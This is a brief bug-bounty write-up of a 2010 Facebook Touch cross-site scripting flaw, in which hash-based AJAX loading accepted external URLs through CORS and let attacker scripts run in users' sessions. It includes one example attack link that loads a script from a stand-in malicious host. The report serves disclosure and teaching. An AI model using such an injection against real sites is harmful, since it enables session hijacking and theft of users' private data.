Facebook XSS via Cross-Origin Resource Sharing

Program: Facebook Bug Type: XSS Bounty: Unspecified Date: 2010-06-06

business-logic api cors xss client-side html5 validation

Summary

A security researcher discovered a serious business logic flaw in Facebook Touch's use of HTML5 and Cross-Origin Resource Sharing (CORS) in 2010. The mobile interface dynamically loaded URLs via AJAX based on the window hash, and failed to restrict these URLs to Facebook-owned domains. As a result, attackers could inject external URLs that were loaded and executed client-side due to CORS, enabling cross-site scripting (XSS). This allowed attackers to run arbitrary JavaScript in a user's session, potentially exposing private data, sending messages, or escalating privileges. The vulnerability was client-side and left no server traces. Once reported, Facebook fixed the issue within a day by implementing client-side URL origin validation.

Key points:

The bug exploited HTML5 CORS combined with unsafe dynamic AJAX content loading.
Attackers could craft links like http://touch.facebook.com/#http://malicious.com/exploit.js.
Malicious scripts could control the user's session and interact with Facebook on the user's behalf.
The underlying issue was not validating URL origins in JavaScript, an example of weak business logic in new web technology adoption.

This summary was partly generated by AI

References

https://maustin.net/articles/2010-07/facebook_html5

← Back to Reports